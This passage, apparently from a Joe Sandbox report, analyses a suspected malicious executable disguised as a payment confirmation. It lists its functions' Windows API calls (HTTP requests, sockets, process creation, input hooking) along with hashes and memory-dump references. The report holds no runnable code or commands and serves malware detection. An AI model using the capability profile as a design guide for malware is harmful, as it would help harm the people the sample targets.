                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend$CtrlParent$_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 313823418-1403004172
                                          • Opcode ID: 223145dbc19cef63b2df0c5569dc3e536661b347c176a91ae1beb9e4e2b3d8c5
                                          • Instruction ID: b108bead879932e8b865adc593db72bd3c9df11aa217037108aa0c76bd8258b6
                                          • Opcode Fuzzy Hash: 223145dbc19cef63b2df0c5569dc3e536661b347c176a91ae1beb9e4e2b3d8c5
                                          • Instruction Fuzzy Hash: 4921D075A00208BFDF04ABA4CC94EFEBBB8EF55314F404115F952E32A4DB789869DB20
                                          Function 0131C8CD Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetParent.USER32 ref: 0131C8D9
                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 0131C8EE
                                          • _wcscmp.LIBCMT ref: 0131C900
                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0131C97B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameParentSend_wcscmp
                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                          • API String ID: 1704125052-3381328864
                                          • Opcode ID: 54f37d8f2caa82fa44697953cde261d00fa799ff2449efa427809a81c5c11a9d
                                          • Instruction ID: 45e8275040e42607d9a1cdb808a525eedf74f8d6d881dc92f2b9205406b3f14c
                                          • Opcode Fuzzy Hash: 54f37d8f2caa82fa44697953cde261d00fa799ff2449efa427809a81c5c11a9d
                                          • Instruction Fuzzy Hash: 4A114C76288747B9FF1A2A39DC0ACA777DDDB0777CB100016F900A50DAFFA1A8114A50
                                          Function 0133B74B Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 0133B777
                                          • CoInitialize.OLE32(00000000), ref: 0133B7A4
                                          • CoUninitialize.OLE32 ref: 0133B7AE
                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 0133B8AE
                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 0133B9DB
                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0133BA0F
                                          • CoGetObject.OLE32(?,00000000,0136D91C,?), ref: 0133BA32
                                          • SetErrorMode.KERNEL32(00000000), ref: 0133BA45
                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0133BAC5
                                          • VariantClear.OLEAUT32(0136D91C), ref: 0133BAD5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                          • String ID:
                                          • API String ID: 2395222682-0
                                          • Opcode ID: 5f96142a4c95d43796f092b95936d510c23f9470a9b2b9a3e58b8c729465c980
                                          • Instruction ID: d387fe2a2c6e6aa48e031d5e2400b420be146a218a24ec6991c4e74a77e25c2a
                                          • Opcode Fuzzy Hash: 5f96142a4c95d43796f092b95936d510c23f9470a9b2b9a3e58b8c729465c980
                                          • Instruction Fuzzy Hash: E0C11171608345AFD700DFA8C88492ABBE9FF88348F00491DF98A9B255DB71E906CB52
                                          Function 0132B05A Relevance: 15.3, APIs: 10, Instructions: 317COMMON
                                          Download Yara Rule
                                          APIs
                                          • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0132B137
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ArraySafeVartype
                                          • String ID:
                                          • API String ID: 1725837607-0
                                          • Opcode ID: ada128f8c1995f03c5140bcea5073e041a1eb4e3228ef7940b12f0d32a2684e0
                                          • Instruction ID: ae87d0b7a495e9a16c3a21f4c22cff40daeeca1af5f0fd78e5ad35f166176d5f
                                          • Opcode Fuzzy Hash: ada128f8c1995f03c5140bcea5073e041a1eb4e3228ef7940b12f0d32a2684e0
                                          • Instruction Fuzzy Hash: 5BC18375A0022ADFDB15DF98D480BBEBBF4FF09319F24406AEA55E7254C734A981CB90
                                          Function 01327212 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __swprintf.LIBCMT ref: 01327226
                                          • __swprintf.LIBCMT ref: 01327233
                                            • Part of subcall function 0130234B: __woutput_l.LIBCMT ref: 013023A4
                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 0132725D
                                          • LoadResource.KERNEL32(?,00000000), ref: 01327269
                                          • LockResource.KERNEL32(00000000), ref: 01327276
                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 01327296
                                          • LoadResource.KERNEL32(?,00000000), ref: 013272A8
                                          • SizeofResource.KERNEL32(?,00000000), ref: 013272B7
                                          • LockResource.KERNEL32(?), ref: 013272C3
                                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 01327322
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                          • String ID:
                                          • API String ID: 1433390588-0
                                          • Opcode ID: e25b258cd1eb143179634205cf0ef4ddbf67d4bbbfd9068aa4417977ab3033a2
                                          • Instruction ID: 3702f9115cfd8f5157798b85d9301fc196266a8c08e00c56ee8f5d7f320682b7
                                          • Opcode Fuzzy Hash: e25b258cd1eb143179634205cf0ef4ddbf67d4bbbfd9068aa4417977ab3033a2
                                          • Instruction Fuzzy Hash: 9A31A171A0026AABDB11AFA5DC89AAF7FACFF09354F048425FE41D2150E734D911CBB0
                                          Function 01324A5B Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentThreadId.KERNEL32(?,?,?,?,?,01323AD7,?,00000001), ref: 01324A7D
                                          • GetForegroundWindow.USER32 ref: 01324A91
                                          • GetWindowThreadProcessId.USER32(00000000), ref: 01324A98
                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 01324AA7
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 01324AB9
                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 01324AD2
                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 01324AE4
                                          • AttachThreadInput.USER32(00000000,00000000), ref: 01324B29
                                          • AttachThreadInput.USER32(?,?,00000000), ref: 01324B3E
                                          • AttachThreadInput.USER32(00000000,?,00000000), ref: 01324B49
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                          • String ID:
                                          • API String ID: 2156557900-0
                                          • Opcode ID: d41181137d29c2841cd3628c5590ada1a145d2c377c4ebfd790ea2a924ad4a08
                                          • Instruction ID: 5322b4e56e4a5a9f82d3d65df86e91ceae52224f59e28b201f1a036e1587ccd6
                                          • Opcode Fuzzy Hash: d41181137d29c2841cd3628c5590ada1a145d2c377c4ebfd790ea2a924ad4a08
                                          • Instruction Fuzzy Hash: 9331A076600214BFEB31AF58E888F6ABBADFB44369F548015FA49D7194D7F4DC408BA0
                                          Function 0135EC19 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetClientRect.USER32(?), ref: 0135EC32
                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 0135EC49
                                          • GetWindowDC.USER32(?), ref: 0135EC55
                                          • GetPixel.GDI32(00000000,?,?), ref: 0135EC64
                                          • ReleaseDC.USER32(?,00000000), ref: 0135EC76
                                          • GetSysColor.USER32(00000005), ref: 0135EC94
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                          • String ID:
                                          • API String ID: 272304278-0
                                          • Opcode ID: e74486ed257726200cf9b50730de1540bdbbaab7a8a403afdfaa5fecb0ada5e0
                                          • Instruction ID: 03e5d79356b6035d5fd735d58732b4a84a0ff91b7fdf4e8481ab7051b2fe1159
                                          • Opcode Fuzzy Hash: e74486ed257726200cf9b50730de1540bdbbaab7a8a403afdfaa5fecb0ada5e0
                                          • Instruction Fuzzy Hash: 7D218E31200205EFDB619BA4EC48FA97B79EB04725F408164FB66A50E6DB714A40DF11
                                          Function 0131D978 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ChildEnumWindows
                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                          • API String ID: 3555792229-1603158881
                                          • Opcode ID: 2d4edc752a6dbbd94492c4982c78e7051af5815b41f4718997618f408a0c049a
                                          • Instruction ID: 71c8c6b628d51aad2d6b3e3bcf0b9f0c40cc3cfe583c46053add3532acd5a6f5
                                          • Opcode Fuzzy Hash: 2d4edc752a6dbbd94492c4982c78e7051af5815b41f4718997618f408a0c049a
                                          • Instruction Fuzzy Hash: 2B91B535A00507AADF0CDFE8C488BEEFBB5BF16318F448519C95AA7154DF306559CB90
                                          Function 012E45A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 211COMMON
                                          Download Yara Rule
                                          APIs
                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 012E45F0
                                          • CoUninitialize.OLE32 ref: 012E4695
                                          • UnregisterHotKey.USER32(?), ref: 012E47BD
                                          • DestroyWindow.USER32 ref: 01355936
                                          • FreeLibrary.KERNEL32(?), ref: 0135599D
                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 013559CA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                          • String ID: close all
                                          • API String ID: 469580280-3243417748
                                          • Opcode ID: 7e6c901b9433bebc1a218b8dd65001319bede7058fa4bdf50b3789e36fad9123
                                          • Instruction ID: 4f4dbe145fb6eb22e1a54d0963440aaf4a94734a9d04e15a2b917c52c5da0e8c
                                          • Opcode Fuzzy Hash: 7e6c901b9433bebc1a218b8dd65001319bede7058fa4bdf50b3789e36fad9123
                                          • Instruction Fuzzy Hash: 61912C34620202CFC719EF58C898E68F7F8FF15715F9542A9E50AA7261DB30AD66CF50
                                          Function 012FC24A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetWindowLongW.USER32(?,000000EB,?,?,000000FF,?,000000FF), ref: 012FC2D2
                                            • Part of subcall function 012FC697: GetClientRect.USER32(?,?), ref: 012FC6C0
                                            • Part of subcall function 012FC697: GetWindowRect.USER32(?,?), ref: 012FC701
                                            • Part of subcall function 012FC697: ScreenToClient.USER32(?,?), ref: 012FC729
                                          • GetDC.USER32 ref: 0135E006
                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0135E019
                                          • SelectObject.GDI32(00000000,00000000), ref: 0135E027
                                          • SelectObject.GDI32(00000000,00000000), ref: 0135E03C
                                          • ReleaseDC.USER32(?,00000000), ref: 0135E044
                                          • MoveWindow.USER32(?,?,?,?,?,?), ref: 0135E0CF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                          • String ID: U
                                          • API String ID: 4009187628-3372436214
                                          • Opcode ID: 568befffb75a959665b59c62d8e8b0c4c40a852190d4133fac01f191f14cc32a
                                          • Instruction ID: e4361d7f90582948150538eb480436c6bb35f4b50c5e7106dc56bf66cf797a2e
                                          • Opcode Fuzzy Hash: 568befffb75a959665b59c62d8e8b0c4c40a852190d4133fac01f191f14cc32a
                                          • Instruction Fuzzy Hash: 0D710235500209DFDF618FA8C880EEABFB9FF48368F044279EE555B2A6C7318955CB50
                                          Function 01334C23 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 01334C5E
                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 01334C8A
                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?,?,?,?,?,?,?,?,?,?), ref: 01334CCC
                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 01334CE1
                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01334CEE
                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 01334D1E
                                          • InternetCloseHandle.WININET(00000000), ref: 01334D65
                                            • Part of subcall function 013356A9: GetLastError.KERNEL32(?,?,01334A2B,00000000,00000000,00000001), ref: 013356BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                          • String ID:
                                          • API String ID: 1241431887-3916222277
                                          • Opcode ID: 805c8eb1e327fbc8610be3fc65d4b35615ee0178424b5b713c0eecd924019476
                                          • Instruction ID: ce5b604cf215db284c25fdbcc82d1c4525b0c5f7403b94b8656eb97dff046b0c
                                          • Opcode Fuzzy Hash: 805c8eb1e327fbc8610be3fc65d4b35615ee0178424b5b713c0eecd924019476
                                          • Instruction Fuzzy Hash: 344185B1600219BFEB129F94DC89FFB7BACFF48358F008116FA019A155D774D9448BA5
                                          Function 01348DD5 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 01348DF4
                                          • GetWindowLongW.USER32(00752260,000000F0), ref: 01348E27
                                          • GetWindowLongW.USER32(00752260,000000F0), ref: 01348E5C
                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 01348E8E
                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 01348EB8
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 01348EC9
                                          • SetWindowLongW.USER32(00000000,000000F0,00000000,?,?,?,0134C8FF,?,?,?,?,?), ref: 01348EE3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: LongWindow$MessageSend
                                          • String ID: `"u
                                          • API String ID: 2178440468-810275233
                                          • Opcode ID: f52495fe7f17fc90bccc8635042eba9b9aeeaa9b1b953007593b0ccfc4ff9c63
                                          • Instruction ID: fdc999dc1ab101edf1af4f0064ed2b6bedb670777d00c92995080b764b9f3e5e
                                          • Opcode Fuzzy Hash: f52495fe7f17fc90bccc8635042eba9b9aeeaa9b1b953007593b0ccfc4ff9c63
                                          • Instruction Fuzzy Hash: 75313731200215EFDB32CF9CD884F553BE9FB4A768F5541A4F6498B2A6CB71B880DB41
                                          Function 0133BAE6 Relevance: 13.9, APIs: 9, Instructions: 419COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0137DBF0), ref: 0133BBA1
                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0137DBF0), ref: 0133BBD5
                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0133BD33
                                          • SysFreeString.OLEAUT32(?), ref: 0133BD5D
                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 0133BEAD
                                          • ProgIDFromCLSID.OLE32(?,?), ref: 0133BEF7
                                          • CoTaskMemFree.OLE32(?), ref: 0133BF14
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                          • String ID:
                                          • API String ID: 793797124-0
                                          • Opcode ID: f0b7614472a5c3060e8b606ea91b0aceb12a42b230d7b95fb40bd4db63372c46
                                          • Instruction ID: 3af7ee178295418496e890b0945e78db35a30ac87a81c489f11afe2207e0f981
                                          • Opcode Fuzzy Hash: f0b7614472a5c3060e8b606ea91b0aceb12a42b230d7b95fb40bd4db63372c46
                                          • Instruction Fuzzy Hash: 8DF11B75A00109EFCF14DFA8C888EAEB7B9FF89314F148559F905AB254DB31AE45CB90
                                          Function 013423C5 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 013423E6
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 01342579
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0134259D
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 013425DD
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 013425FF
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 01342760
                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 01342792
                                          • CloseHandle.KERNEL32(?), ref: 013427C1
                                          • CloseHandle.KERNEL32(?), ref: 01342838
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                          • String ID:
                                          • API String ID: 4090791747-0
                                          • Opcode ID: 6a734e91a743196e2cf70ed8d6d2d748c6701f1a8be478a2d78a30f4ec0930c6
                                          • Instruction ID: 9d59b3c3eb93127c0549d35bf3d7fc7d373a3bd8afa29f8e185a761c0abd2a79
                                          • Opcode Fuzzy Hash: 6a734e91a743196e2cf70ed8d6d2d748c6701f1a8be478a2d78a30f4ec0930c6
                                          • Instruction Fuzzy Hash: 48D1B031604302DFDB15EF28D494B6ABBE5EF84328F14845DF889AB2A1DB71EC41CB52
                                          Function 01339A66 Relevance: 13.7, APIs: 9, Instructions: 247networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • select.WSOCK32 ref: 01339B38
                                          • WSAGetLastError.WSOCK32(00000000), ref: 01339B45
                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 01339B6F
                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 01339B90
                                          • WSAGetLastError.WSOCK32(00000000), ref: 01339B9F
                                          • htons.WSOCK32(?,?,?,00000000,?), ref: 01339C51
                                          • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0137DBF0), ref: 01339C0C
                                            • Part of subcall function 0131E0F5: _strlen.LIBCMT ref: 0131E0FF
                                            • Part of subcall function 0131E0F5: _memmove.LIBCMT ref: 0131E121
                                          • _strlen.LIBCMT ref: 01339CA7
                                          • _memmove.LIBCMT ref: 01339D10
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                                          • String ID:
                                          • API String ID: 3637404534-0
                                          • Opcode ID: 93949ce82d7c0592a930bf2c215812f3b3d9f20cc8916a3b4cb0a8fd65a6f253
